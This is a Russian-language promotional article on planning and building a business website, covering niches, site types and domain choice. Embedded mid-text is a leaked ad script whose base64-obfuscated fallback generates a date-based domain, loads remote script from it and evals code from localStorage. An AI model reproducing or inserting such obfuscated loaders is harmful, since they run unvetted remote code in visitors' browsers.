Как создать сайт и зачем он нужен вашему бизнесу
Мы живем в такое время, когда любая компания имеет свой сайт. Представительство в мировой Сети не только подчёркивает статус фирмы, но и позволяет ей развиваться, увеличивая продажи (если мы говорим о торговле). Сразу отметим, что разработка сайта — задача не такая простая, как кажется. Если вы хотите, чтобы он приносил прибыль, лучше сразу обратиться к профессионалам. Люди, которые давно варятся в этой кухне, сразу создадут то, что подойдет именно вашему бизнесу. Да, многие самостоятельно стараются сделать ресурс, на простом движке, но в итоге обращаются к специалистам. Например, компания BrainLab имеет достаточный опыт в данной сфере и может создать сайт любой сложности, под любой бизнес. В приоритете стоят пожелания клиента с которым сотрудники фирмы на связи 24/7.
Советы по созданию сайта: о чем стоит помнить
Чтобы сделать сайт, который будет приносить вам прибыль, а не просто висеть в Интернете, стоит все грамотно и правильно распланировать. Если мы говорим о создании интернет-магазина, то первое, что нужно сделать — определиться с нишей. Здесь можно дать пару дельных советов:
Проведите анализ запросов выбранной вами ниши. Если их ничтожно мало, то может стоит задуматься о другом варианте?
Интернет-магазинам сразу стоит изучать коммерческую часть этого вопроса, то есть запрос должен содержать слово “купить”, “стоимость”, “цена” и т.д.
Выбирая нишу помните о таком понятии как сезонность.
Сразу рассчитайте чистую прибыль с одной продажи.
Помните и про конкуренцию. Если она сильно велика, но вы все же хотите продавать именно этот товар, без рекламы и грамотного SEO вам не обойтись. К слову, последнее в любом случае необходимо вашему сайту.
Далее вы должны определиться с видом сайта. Их существует достаточное количество и каждый выполняет свою конкретную задачу:
Интернет-магазин и сайты-каталоги. Эти два типа сайта имеют общую цель, но работают по-разному. В первом случае пользователь может купить товар в один клик, а во втором — необходимо заполнить форму, после чего с клиентом свяжется менеджер.
Корпоративный сайт. Такой ресурс выступает отличным маркетинговым инструментом. Он не только дает возможность продать товар/услугу, но и детально рассказывает аудитории о компании и ее деятельности.
Сайт-визитка. Такой простой и легки сайт отлично подойдет тем, кто только начал свой бизнес и в будущем ему понадобится крупный ресурс.
Лендинг или целевая страница. По названию понятно, что у ресурса есть основная цель — продать один конкретный товар или одну услугу. Это самый прибыльный тип сайта, он не имеет в себе лишней информации. Это легкий способ добиться своей цели.
Информационные порталы. Такой сайт нужен для того, чтобы делиться ценной информацией с другими. Логично, что сайты создаются для того, чтобы монетизировать их. В данном случае зарабатывать можно на рекламе. Но перед этим придется вкинуть немало денег на раскручивание такого ресурса. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Следующий важный этап — доменное имя. Оно должно быть коротким и запоминающимся. Также важно арендовать домен из основных зон: com, org, net, ua.
Дальше необходимо собрать семантическое ядро — база поисковых слов, фраз, по которым пользователи Интернета будут искать вас.
После, приступайте к разработке концепции сайта. Нарисуйте на бумаге то, как вы видите свой ресурс. Учтите все до мелочи. Лишь потом, можно рисовать дизайн сайта. Конечно, если обратиться к профессионалам, они помогут вам в этом вопросе, ведь часто, изучив сайты-конкуренты, в голове происходить бардак и сложно определиться.
При разработке сайта, не стоит спешить. Распланируйте все до мелочи, только потом приступайте к работе. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/kak-sozdat-sajt-i-zachem-on-nuzhen-vashemu-biznesu/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook